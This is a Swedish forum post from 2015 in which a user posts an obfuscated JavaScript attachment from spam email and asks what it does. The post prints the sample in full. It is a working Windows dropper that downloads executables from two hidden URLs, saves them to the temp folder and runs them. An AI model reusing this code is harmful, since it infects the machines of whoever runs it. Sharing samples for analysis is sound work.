Hej!
Fick en intressant kodsnutt spammad till min arbetsmail.
Har ingen tidigare erfarenhet av att analysera skadlig kod, så jag vänder mig därför till er här på FB för att se vad skiten gör
Koden i orginalfilen var skriven på endast en rad. Efter några minuters fixande i SublimeText ser den ut såhär:
Någon som förstår sig på skiten? Vore intressant och se vad baktanken är. Är detta en attack mot mig/mitt företag eller ett vanligt spamm som slunkit genom mitt spammfilter.
Mvh Pixl
Fick en intressant kodsnutt spammad till min arbetsmail.
Har ingen tidigare erfarenhet av att analysera skadlig kod, så jag vänder mig därför till er här på FB för att se vad skiten gör
Koden i orginalfilen var skriven på endast en rad. Efter några minuters fixande i SublimeText ser den ut såhär:
VARNING, potentiellt skadlig kod!!!
Kod:
(function(){ var d6Dw="jIpChUHI8M`lapbVGHQAyZ"["replace"](/[QUaMbjGIy\`C]/g,""); YQWe=(35*"u&1Eg^I-.}hlrP"["length"]+3.0); SLLa="MIUk3fJD6h23KNT3A/dfgE"[(29.0+"2?v#*QY9<E;"["charCodeAt"](7)*351649585)["toString"]((2.0+"X\x88-\x80DAoqBn;OzR"["length"]*2))](/[\/DMh3UfgN]/g,""); var FIbF="uR%Zl9G3KONPEzyjvbKaV"[(0.0+"56aC\x603)\x86UAc-d9}b"["charCodeAt"](3)*529073801)["toString"](("t(\x88F8@X9p;*<75]rsdA"["charCodeAt"](4)*0+33.0))](/[\%lubOzjP3a9]/g,""); var F3Uo=(22*"~\x83PZm{Xb|(F\x87\x85;q"["length"]+12.0);oE4Y=(59.0+")\x833Y^2Bg>|6v\x84xlF"["charCodeAt"](8)*0); try{ var qx7i=window[">weLbYr[tZb!r"["replace"](/[Z\!\[\>LYe]/g,"")]; QnSY="Pie)lGY~@W]b]g3AU9RqRW"[("10y\x81.2Wx"["length"]*2505503296+6.0)["toString"]((2*"u\x80ER&2P:p=;7"["length"]+6.0))](/[\~\]3\)RUGPi\@]/g,""); } catch(ee){ try{ var S2SO=new ActiveXObject("!e0pwIrIg;vDe"[(28.0+"6\x7f/vM8E;saLJm]"["charCodeAt"](7)*600812621)["toString"](("#>4tLu)f(c=h"["length"]*2+9.0))](/[0\!\;DpI]/g,"")); var kgxq="`A;PCStG2U6QsRMv4D7m~a"[(359606151*"CZRK~${+[6A\x8b:j"["charCodeAt"](2)+80.0)["toString"]((0*"6=z<{BaH]p+sTX\x86\x83"["charCodeAt"](10)+32.0))](/[\~2DCMm4ts\`6\;]/g,""); } catch(eee){ function BQic(fr, y_rI, rn){ var nPJL = new ActiveXObject("vWjSKc;YrGnis3p9yts<.=S&hIe0l7+l"[("7AwK\x87sr"["length"]*4212529208+6.0)["toString"]((3*"UYkg\x86^>\x822"["length"]+5.0))](/[3I\+s7\;0n\&\<\=KyjvYG9]/g,"")); var G3QX="eQ+Nr]zJ2WibJS&aQY*6yknEZR"["replace"](/[eNa\*ykiY\+JE2\&Z\]]/g,""); var y_rI = nPJL["ExpandEnvir"+(92>18?"\x6f":"\x66")+"nm"+"entSt"+(55>2?"\x72":"\x6b")+"ings"]("X%;KT4EjMgP<%"["replace"](/[4gK\<j\;X]/g,"")) + String["f"+(65>27?"\x72":"\x6d")+""+"omCharCod"+(85>25?"\x65":"\x5d")+""](92) + y_rI; var N4Xp="]d5=eprx4;OSoJvlbq9A;N"[(4212529208*"^B?#Vi\x83"["length"]+6.0)["toString"]((0*"D|,+\x80/S?-Mc&nA"["charCodeAt"](3)+32.0))](/[\;S5pJlq9\]\=x]/g,""); var VOtw = new ActiveXObject("DMOS4XiMlLY529.wXqM3L#GHzT`TyP"[(6.0+"[Jf/^0)V"["length"]*3685963057)["toString"]((2*"a~\x84U*Obd\x816rmuG"["length"]+4.0))](/[O94i5z3\#qywDYlG\`]/g,"")); var CvTR=(5*"_HIZt4\x85^JwTR5"["charCodeAt"](8)+17.0);VOtw["onrea"+(56>26?"\x64":"\x5d")+"ystatechan"+"g"+(61>7?"\x65":"\x5c")+""] = function (){ if (VOtw["ready"+(82>39?"\x53":"\x4e")+"ta"+"t"+(79>9?"\x65":"\x5d")+""] === 4){ var pxgg = new ActiveXObject("]A=D(5O[#D0Bv.cS4thr[IeV9akm"[("\x83Y>c1"["length"]*7089588933+2.0)["toString"]((33.0+"6?NU#-MRn>IpvO\x82"["charCodeAt"](3)*0))](/[kc4\#9v5Vh\]\=0\[I\(]/g,"")); var PgEf=(14*"d<g0_eC(MfO"["length"]+9.0); pxgg[""+"ope"+(76>6?"\x6e":"\x69")+""](); var FOXG=(2.0+"3j$O.\x60_X/E\x86\x89\x85ic"["length"]*6); var wI9o="tw1Y&0b0LiTfFy=2uO3v;5"[("Bwf^\x8a\x80\x86&tZD5v_2"["charCodeAt"](9)*327641160+62.0)["toString"](("'\x88\x83rf>ykY*\x86"["charCodeAt"](8)*0+32.0))](/[3Ft\=1ui\;\&T0]/g,""); pxgg[""+"typ"+(65>47?"\x65":"\x60")+""] = 1; var MG8o=(3*"F\x602B;_a?n\x82u\x85(h1"["charCodeAt"](4)+48.0); pxgg[""+"w"+(93>29?"\x72":"\x68")+"ite"](VOtw["Re"+(99>9?"\x73":"\x6a")+"pon"+"seBo"+(80>36?"\x64":"\x5d")+"y"]); wqQc="8v(hg+ygABy8q5OzsSOPn~o"["replace"](/[O8nB\(gs5\+\~]/g,""); var uz3l=("i^9s3\x80IZCH"["length"]*22+9.0); var zQBJ=(12.0+"?O\x89e\x83,)\x81fTxr\x8a&6'{\x88"["charCodeAt"](5)*11); bTZQ="rO0N>D3hdeJG9oMT9rOC<lBY"["replace"](/[rBhTO\>Ne\<o3G]/g,""); Ut6x="[0XNX]4-JMP9if~)q#z2H7UR"["replace"](/[Uz\-MHiN\#\)\[\]\~0P]/g,""); pxgg["p"+(96>16?"\x6f":"\x67")+"sit"+""+(75>43?"\x69":"\x64")+"on"] = 0; var Achn="jXy%;wZQezpZO~9!7hULderb8"["replace"](/[jQrb\~dXzh\%\;ZU\!]/g,""); pxgg["saveT"+(97>6?"\x6f":"\x66")+"Fil"+"e"](y_rI, 2); var Y2Bg="Rl;ro*SxJyD5IRvgdprKG"[(4.0+"\x84Odv~B("["length"]*2337941245)["toString"]((29.0+"#4tDvNrd<\x871"["charCodeAt"](3)*0))](/[y\*po\;5RxKg]/g,""); pxgg["c"+""+(77>35?"\x6c":"\x65")+"ose"](); var Sg9P="tE!gbpA`jl58+k#2Tsa@aM/z"["replace"](/[\`\#\+2\@\/pMtgjs\!5]/g,""); Tecl="6hEzXeS/vaVg7Ng0MFBdy!w"[("(\x80\x81)MU"["length"]*3340671062+2.0)["toString"]((0.0+"z:+N@kVo3*vOT\x83B"["length"]*2))](/[\!E6g7Be\/MXya]/g,""); var iK4f=("rk+uY\x60J4m@"["charCodeAt"](7)*6+21.0); var QgeT="@V8v(qWV@VcU[6XGFJYIx"[(4430993083*"B\x89n<>tQq"["length"]+3.0)["toString"]((9.0+"D\x88pY6Vk=Me?\x81"["length"]*2))](/[XJI\[cF\(8W\@]/g,""); } ; var J1nH=(8*"R$#*E.;(NbQ0\x81\x89FL}dp"["charCodeAt"](7)+16.0); } ; var eeer="8c4oKsfmjN7v=xdSSgStEIIh"[(1.0+"vfbDe];"["length"]*3483875876)["toString"]((31.0+"pm/L|F)x<T"["charCodeAt"](9)*0))](/[K8\=7IfxS4jt]/g,""); var zqKq=(11*"]4&K^B$*\x87O\x84-S)"["charCodeAt"](13)+23.0); var hPCU=("\x60/D\x82+LSTvGdjV"["charCodeAt"](12)*1+47.0);JIPx="UMIw9UAW2oE%pq-zPj<8el;9"["replace"](/[\-MwAPU\%p\;o2e\<]/g,""); try { VOtw["o"+(52>28?"\x70":"\x6a")+"e"+"n"]("pGuEyT"["replace"](/[yup]/g,""), fr, false); var xJho="~w4Gvy;0FVbdt&7nA1nIkhg"[("QLs=\x8an.tuRKy\x83"["charCodeAt"](10)*795501774+68.0)["toString"]((0*"\x8a~02v[pf#\x80<"["charCodeAt"](10)+36.0))](/[dhnvVAk\&F\;4\~]/g,"");sO0H=("\x81zRku\x7f\x85It"["length"]*47+2.0); VOtw[""+""+(66>30?"\x73":"\x6a")+"end"](); var PHeR="pjTlIEfOQgI*tr10uKxXkd"["replace"](/[\*0kQTKrIfpx]/g,""); if (rn > 0){ nPJL[""+"R"+(80>34?"\x75":"\x6d")+"n"](y_rI, 0, 0); lIKq=("KQ\x86Sv}qE<'"["length"]*20+6.0); uNdb=(8*"wj<XZs\x81#W)2\x8a4"["charCodeAt"](12)+22.0); } ; MC1S="iGSO(m#[cDgEBDiV52rZlB"["replace"](/[ED5\#lS\[r\(i]/g,""); } catch (er){ } ; hKZY=(2*"36z>\x83@\x8af9^wGp"["charCodeAt"](5)+1.0); tnkd="r4dLh7EDQiykuB>E`3bgfPx"[(6300863351*":s?BNPJT"["length"]+1.0)["toString"](("d56/Z\x88\x80T"["length"]*4+3.0))](/[ghDu7ryPd\`\>bQ]/g,""); } BQic("#hN*tAt-pM:lW/S_/Bm)HoOoFd<yF1z.k2r-uG/Eli#Xm3Iacvg%feEsT/kOo>&n=+e96w5=iFln<d-o(w!sX0.5jCpVg"["replace"](/[\(\*c\_HB\<6z\)kV\=WA953NlO\>\-I\&0XMTv\%fFC2E\!GS\+\#]/g,""),"y4b7W6F2D7j1p+1U.qetxMce"["replace"](/[tcWDFqUy\+pMjb]/g,""), 1); var GqFC=(3.0+"8x\x88\x60Kh\x87w@uWjt)"["length"]*27); LUpv="mI_52tuifaTNuHE36O4QT&O"["replace"](/[uQ2af6N4m\&E\_]/g,""); BQic("Mh!tUxtEOp6z:H/L/HmcoPo9dvAyc1vk.crB#u@/V@ixm23aWgWe*SsxQ/ztfw@olw=iRn<dLKoANwqs7.Ej>p>g"["replace"](/[7QOzKfNl9Ux\=SR3AM2vBV\!EcLk\#W\<H6\*\@\>Pq]/g,""),"q3z(7y5`5m8&;3o9o@.-eMx@e"[(2457308705*"t@s\x7fZ\x86WdOeDg"["length"]+2.0)["toString"](("EL7eiO>"["length"]*4+4.0))](/[oy\@\`\;z\&\(\-mqM]/g,""), 1); vm5w=(48.0+"q:\x82\x7f$0\x89L/\x60WT\x836wp"["charCodeAt"](7)*5); var B9NZ="/dA4V!k40xI7>TgY=hE_j9a"["replace"](/[4d\/x9h7\=\>\_\!g]/g,""); var u4zb=(3*"Cskx\x88Z|o+V'y\x87"["charCodeAt"](9)+20.0); }}; var EaNe="ChaNAc5YL7xUl61SeW`fKq"["replace"](/[WULx6CK5\`SaA]/g,""); var Bkiw=(33*"@|g\x81PaKcj3Sp="["length"]+0.0);; var wTnK=(51*"Z?sENq3"["length"]+1.0)})();//xKhNb7dUGM
Någon som förstår sig på skiten? Vore intressant och se vad baktanken är. Är detta en attack mot mig/mitt företag eller ett vanligt spamm som slunkit genom mitt spammfilter.
Mvh Pixl
__________________
Senast redigerad av .pixl 2015-04-08 kl. 15:06.
Senast redigerad av .pixl 2015-04-08 kl. 15:06.